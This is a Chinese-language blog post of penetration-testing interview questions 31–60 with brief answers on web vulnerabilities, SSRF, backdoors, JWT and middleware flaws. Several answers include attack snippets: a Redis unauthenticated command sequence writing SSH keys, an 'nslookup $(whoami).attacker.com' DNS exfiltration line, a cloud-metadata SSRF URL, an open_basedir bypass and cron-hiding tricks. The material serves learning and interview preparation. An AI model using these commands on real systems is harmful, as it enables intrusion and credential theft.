2026年渗透测试面试题总结-2(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

[31. Cookie测试内容](#31. Cookie测试内容)

[32. 业务逻辑漏洞类型](#32. 业务逻辑漏洞类型)

[33. 文件包含漏洞](#33. 文件包含漏洞)

[34. 任意密码重置漏洞](#34. 任意密码重置漏洞)

[35. 仅允许上传ZIP的渗透思路](#35. 仅允许上传ZIP的渗透思路)

[36. aspx木马权限比asp大的原因](#36. aspx木马权限比asp大的原因)

[37. 单一登录页面的渗透思路](#37. 单一登录页面的渗透思路)

[38. 有危害的HTTP请求头](#38. 有危害的HTTP请求头)

[39. 越权访问类型区别](#39. 越权访问类型区别)

[40. XSS分类与存储型XSS](#40. XSS分类与存储型XSS)

[41. 主机入侵排查日志](#41. 主机入侵排查日志)

[42. Python常用标准库](#42. Python常用标准库)

[43. reverse_tcp vs bind_tcp](#43. reverse_tcp vs bind_tcp)

[44. OAuth认证漏洞](#44. OAuth认证漏洞)

[45. 获取CDN后真实IP](#45. 获取CDN后真实IP)

[46. 跨域实现方案](#46. 跨域实现方案)

[47. JSONP跨域 vs CORS跨域](#47. JSONP跨域 vs CORS跨域)

[48. 常见排序算法](#48. 常见排序算法)

[49. SSRF漏洞利用](#49. SSRF漏洞利用)

[50. 常见后门方式](#50. 常见后门方式)

[51. open_basedir绕过](#51. open_basedir绕过)

[53. 蓝队反杀红队场景](#53. 蓝队反杀红队场景)

[54. Linux计划任务隐藏](#54. Linux计划任务隐藏)

[55. Redis未授权getshell](#55. Redis未授权getshell)

[57. Java中间件漏洞举例](#57. Java中间件漏洞举例)

[58. DNS外带漏洞利用场景](#58. DNS外带漏洞利用场景)

[59. HTTP-Only Cookie绕过](#59. HTTP-Only Cookie绕过)

[60. 中间件漏洞总结](#60. 中间件漏洞总结)

复制代码
31	cookie你会测试什么内容
32	说出几个业务逻辑漏洞类型?
33	简述文件包含漏洞
34	业务逻辑漏洞,用户任意密码重置有什么例子,因为什么因素导致的?
35	渗透测试过程中发现一个只能上传zip文件的功能,有什么可能的思路?
36	为什么aspx木马权限比asp大?
37	只有一个登录页面有哪些思路?
38	请求头中哪些是有危害的?
39	谈谈水平/垂直/未授权越权访问的区别?
40	xss有什么?执行存储型的xss的危害和原理
41	主机疑似遭到入侵,要看哪里的日志
42	python常用的标准库
43	reverse_tcp 和 bind_tcp 的区别?
44	oauth认证过程中可能会出现什么问题,导致什么样的漏洞?
45	做了cdn的网站如何获取真实IP
46	如何实现跨域?
47	jsonp跨域与CORS跨域的区别?
48	算法?了解过什么排序?
49	SSRF漏洞利用?
50	常见后门方式?
51	open_basedir访问目录限制绕过方法?
52	PHP代码审计中容易出问题的点?
53	红蓝对抗中蓝队反杀红队场景和姿势?
54	linux计划任务,黑客隐藏自己的计划任务会怎么做?
55	Redis未授权常见getshell的几种方式?
56	JWT的攻击手法?(头部、负载、签名)
57	JAVA中间件的漏洞,举几个例子?
58	DNS外带可以用在哪些漏洞?
59	HTTP-Only禁止的是JS读取cookie信息,如何绕过这个获取cookie
60	中间件漏洞总结?

31. Cookie测试内容

复制代码
markdown

1. **安全属性检测** - `HttpOnly`(防XSS窃取)、`Secure`(仅HTTPS传输)、`SameSite`(防CSRF) 2. **有效性验证** - 过期时间、域/路径权限、篡改后是否失效 3. **敏感信息泄露** - 是否存在明文用户名、密码、SessionID 4. **会话管理** - 退出登录后Cookie是否清除、多终端登录冲突处理


32. 业务逻辑漏洞类型

精简至6类核心漏洞:

  1. 订单篡改(如价格参数修改)
  2. 验证绕过(短信验证码未与账号绑定)
  3. 竞争条件(并发请求薅优惠券)
  4. 权限缺失(平行越权删除他人订单)
  5. 流程跳过(未校验步骤顺序强制跳转)
  6. 条件滥用(无限领取新人福利)

33. 文件包含漏洞

复制代码
pmarkdown

- **原理**:服务端未过滤用户输入的文件路径,导致恶意文件执行。 - **类型**: - **本地包含(LFI)**:包含服务器本地文件(如`?page=/etc/passwd`) - **远程包含(RFI)**:加载外部URL文件(需`allow_url_include=On`) - **危害**:敏感文件读取、代码执行、配合文件上传getshell。


34. 任意密码重置漏洞

例子与成因

漏洞场景 导致原因
验证码未绑定用户 修改手机号参数重置他人密码
密码凭证可爆破 短信/邮箱验证码位数少无限制
重置链接可预测 Token未随机化(如用时间戳)
跳过验证步骤 强制访问最终重置接口

35. 仅允许上传ZIP的渗透思路

复制代码
markdown

1. **ZIP炸弹**:上传高压缩比文件导致服务拒绝 2. **路径穿越**:解压时利用`../../`覆盖系统文件 3. **恶意符号链接**:包含指向敏感文件的软链接 4. **解压RCE**:利用解压程序漏洞(如Zip Slip CVE-2018-1000845) 5. **隐藏文件类型**:修改后缀为.zip实则上传.jsp/.php文件


36. aspx木马权限比asp大的原因

复制代码
markdown

- **.NET框架特性**:aspx基于.NET拥有更完整的API访问权限(如操作注册表、调用系统进程) - **运行环境差异**:ASP运行于IIS沙盒,ASPX以更高权限的`aspnet_wp.exe`进程执行 - **组件支持**:可直接调用`System.Diagnostics`执行系统命令


37. 单一登录页面的渗透思路

复制代码
markdown

1. **爆破攻击**:字典爆破账号密码、验证码 2. **SQL注入**:用户名参数尝试`admin' --` 3. **密码重置绕过**:跳转至重置页面或修改密码参数 4. **响应分析**:差异响应判断有效用户(如"用户不存在"提示) 5. **框架漏洞**:利用Struts2、Spring等历史RCE漏洞


38. 有危害的HTTP请求头

危险头部及利用

  • Host: 域名劫持、缓存污染
  • X-Forwarded-For: IP欺骗绕过IP限制
  • User-Agent: 注入XSS或利用特定UA的解析漏洞
  • Referer: 开放重定向漏洞
  • Cookie: 敏感信息泄露、Session固定攻击

39. 越权访问类型区别

复制代码
markdown

| 类型 | 特点 | 例子 | |------------|-------------------------------|--------------------------| | **水平越权** | 同权限用户访问他人数据 | 修改URL参数查看他人订单 | | **垂直越权** | 低权限用户执行高权限操作 | 普通用户访问管理员接口 | | **未授权** | 无需登录直接访问受限资源 | 直接访问/admin未跳转登录 |


40. XSS分类与存储型XSS

复制代码
markdown

- **XSS类型**: - 反射型(URL参数即时触发) - 存储型(恶意代码存入数据库) - DOM型(前端JS操作触发) - **存储型XSS原理**: 用户输入(如评论)未经过滤存入数据库 → 其他用户访问时加载执行恶意脚本 - **危害**: - 窃取Cookie实现会话劫持 - 钓鱼攻击伪造登录框 - 传播蠕虫(如微博早期XSS蠕虫)


41. 主机入侵排查日志

关键日志位置

  1. 系统日志
    • Linux: /var/log/auth.log(登录记录)、/var/log/syslog
    • Windows: 事件查看器(安全日志ID 4624/4625)
  2. Web日志 :Apache/Nginx访问日志(access.log
  3. 应用日志 :数据库操作日志、中间件日志(如Tomcat catalina.out
  4. 安全设备:HIDS记录、防火墙拦截日志

42. Python常用标准库

复制代码
markdown

1. **系统交互**:`os`, `sys`, `subprocess` 2. **网络请求**:`urllib`, `requests`(需安装) 3. **数据处理**:`json`, `csv`, `re`(正则) 4. **并发**:`threading`, `multiprocessing` 5. **工具类**:`datetime`, `hashlib`, `argparse`


43. reverse_tcp vs bind_tcp

复制代码
markdown

| 类型 | 工作原理 | 适用场景 | |--------------|------------------------------|------------------------| | **reverse_tcp** | 木马主动连接攻击者服务器 | 绕过受害者防火墙出站规则 | | **bind_tcp** | 木马监听本地端口等待连接 | 内网渗透直连目标 |


44. OAuth认证漏洞

漏洞与后果

  • 重定向劫持redirect_uri未校验 → 令牌泄露给攻击者
  • Scope滥用:未限制权限范围 → 获取超范围用户数据
  • CSRF攻击:未绑定state参数 → 劫持账号绑定攻击者应用
  • 令牌泄露:URL中传递Token → 被浏览器历史记录泄露

45. 获取CDN后真实IP

复制代码
markdown

1. **历史DNS记录**:查询`securitytrails.com`等平台 2. **子域名探测**:`mail.example.com`可能未使用CDN 3. **SSL证书匹配**:通过Censys搜索相同证书IP 4. **邮件服务器**:从系统邮件Header提取源IP 5. **特定请求**: - 发送非法Host头诱发CDN回源 - 利用DDoS使CDN回源暴露IP


46. 跨域实现方案

复制代码
markdown

- **JSONP**:通过`<script>`标签加载跨域数据(仅GET) - **CORS**:服务端设置`Access-Control-Allow-Origin`响应头 - **代理转发**:后端代理请求跨域资源(如Nginx配置) - **postMessage**:浏览器窗口间跨域通信 - **WebSocket**:不受同源策略限制


47. JSONP跨域 vs CORS跨域

复制代码
markdown

| **特性** | JSONP | CORS | |----------------|---------------------------|-------------------------------| | **协议支持** | 仅GET | 所有HTTP方法 | | **安全性** | 易受XSS攻击 | 需预检请求(OPTIONS)验证 | | **实现方式** | 前端动态创建<script>标签 | 服务端添加响应头 | | **错误处理** | 难以捕获错误 | 标准HTTP错误码 |


48. 常见排序算法

对比表

算法 时间复杂度 特点
冒泡排序 O(n²) 简单但效率低
快速排序 O(n log n) 平均 分治思想,常用
归并排序 O(n log n) 稳定,适合链表
堆排序 O(n log n) 原地排序,空间复杂度O(1)

49. SSRF漏洞利用

复制代码
markdown

- **攻击内网服务**:扫描`192.168.x.x`或访问`file:///etc/passwd` - **云元数据利用**:访问`http://169.254.169.254`获取AWS/Aliyun密钥 - **协议封装**: - `gopher://` 构造Redis命令写SSH密钥 - `dict://` 探测端口开放情况 - **绕过技巧**: - 使用`[::]`IPv6格式、域名重定向、DNS Rebinding


50. 常见后门方式

复制代码
markdown

1. **Web后门**:隐蔽的WebShell(如图片马、`.htaccess`解析漏洞) 2. **系统后门**: - Linux:添加SSH公钥、crontab定时任务 - Windows:隐藏用户账户、DLL劫持 3. **内存马**:注入到Java Agent/Tomcat Filter 4. **隧道后门**:ICMP/DNS隧道传输数据


51. open_basedir绕过

复制代码
markdown

- **符号链接攻击**:创建指向目标目录的软链接 - **glob协议**:利用`glob://`协议遍历目录(PHP特定版本) - **命令执行函数**:通过`system()`执行`find`命令 - **chdir()突破**: ```php mkdir('bypass'); chdir('bypass'); chdir('../'); // 回退上级目录 ini_set('open_basedir','..'); // 重置路径

复制代码
---
 
### **52. PHP代码审计高危点**
```markdown
1. **输入未过滤**:`$_GET/$_POST`直接进入危险函数(如`eval()`)  
2. **文件操作**:`include/require`引发文件包含,`move_uploaded_file`路径穿越  
3. **命令执行**:`exec()`/`system()`参数可控  
4. **反序列化**:`unserialize()`触发魔术方法(如`__wakeup()`)  
5. **SQL拼接**:字符串拼接导致注入(尤其`mysqli_query`)  

53. 蓝队反杀红队场景

复制代码
markdown

1. **蜜罐陷阱**:伪造漏洞诱导攻击,记录红队IP/工具指纹 2. **流量分析**:识别C2服务器通信特征反向渗透 3. **时间差攻击**:在红队驻留阶段替换后门为反向控制程序 4. **法律取证**:通过日志固定证据,配合执法机关溯源


54. Linux计划任务隐藏

复制代码
markdown

- **路径隐藏**:写入非标准路径(如`/dev/shm`) - **文件名伪装**:以`.`开头命名文件(如`.update.sh`) - **权限控制**:设置`chattr +i`防止删除 - **日志擦除**:覆盖`/var/log/cron`日志记录 - **动态任务**:通过内存马动态添加临时任务


55. Redis未授权getshell

复制代码
markdown

1. **写SSH密钥**: ```bash redis-cli -h 目标IP config set dir /root/.ssh config set dbfilename authorized_keys set x "\n\n公钥内容\n\n" save

  1. 写WebShell:指定网站目录写入PHP文件

  2. 主从复制RCE:伪造恶意Redis主节点同步模块


    56. JWT攻击手法

    markdown 复制代码
    - **头部篡改**:  
      - 修改`alg`为`none`绕过签名(需删除签名)  
    - **负载篡改**:  
      - 修改`sub`或`role`提升权限  
      - 密钥爆破(弱密钥如`secret`)  
    - **签名绕过**:  
      - 密钥混淆攻击(HS256 vs RS256)  
      - 注入`kid`参数指向恶意密钥  

57. Java中间件漏洞举例

复制代码
markdown

1. **Tomcat**: - CVE-2017-12615 PUT方法上传WebShell - CVE-2020-1938 Ghostcat文件包含 2. **WebLogic**: - CVE-2019-2725 反序列化RCE - CVE-2020-14882 未授权命令执行 3. **JBoss**: - JMXInvokerServlet 反序列化


58. DNS外带漏洞利用场景

复制代码
markdown

- **无回显漏洞利用**: - SSRF/XXE/SQL盲注数据外传(`data.attacker.com`) - 命令执行结果分块传递(`nslookup $(whoami).attacker.com`) - **绕过防火墙**:DNS协议通常被放行


59. HTTP-Only Cookie绕过

复制代码
markdown

1. **XSS+中间人攻击**: - 恶意JS发起请求 → 代理拦截响应头窃取Set-Cookie 2. **浏览器漏洞**: - 特定版本Chrome的XSS审核器绕过(CVE-2020-6519) 3. **物理接触**: - 直接读取浏览器内存(需本地执行程序)


60. 中间件漏洞总结

核心漏洞类型

  1. 配置缺陷
    • 目录列表开启(Apache Options +Indexes
    • 未删除默认页面(Tomcat /manager/html
  2. 解析漏洞
    • IIS 6.0分号解析(a.asp;.jpg
    • Nginx错误配置导致PHP解析(a.jpg/.php
  3. 协议处理
    • HTTP请求走私(CVE-2023-25690)
    • FastCGI未授权访问
  4. 反序列化
    • WebLogic/JBoss等Java中间件历史RCE漏洞
相关推荐
dongbaoming2 小时前
调用其他应用的activity结束后回到调用app
android
爱学java的ptt2 小时前
AQS简单源码思路和手撕实现
java·网络
写代码的【黑咖啡】2 小时前
Python中的BeautifulSoup:强大的HTML/XML解析库
python·html·beautifulsoup
楠目2 小时前
HTTPS原理详解
网络·http
TheNextByte12 小时前
iPhone存储空间已满?如何轻松释放iPhone空间?
android·ios·iphone
八宝粥大朋友2 小时前
OpenSSL构建android 脚本
android·ssl
李守聪2 小时前
小程序定制,我的实践复盘分享
python
忍冬行者2 小时前
Elasticsearch 介绍及集群部署
java·大数据·elasticsearch·云原生·云计算
罗小爬EX2 小时前
升级IDEA 2025.3+后 Spring Boot 配置文件自动提示插件推荐
java·spring boot·intellij-idea